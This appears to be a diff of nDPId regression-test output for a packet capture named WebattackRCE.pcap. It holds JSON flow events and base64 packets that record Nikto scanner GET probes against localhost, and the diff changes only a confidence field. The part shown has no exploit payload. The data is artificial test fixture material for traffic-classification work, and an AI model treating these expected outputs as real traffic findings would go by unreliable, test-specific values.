00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 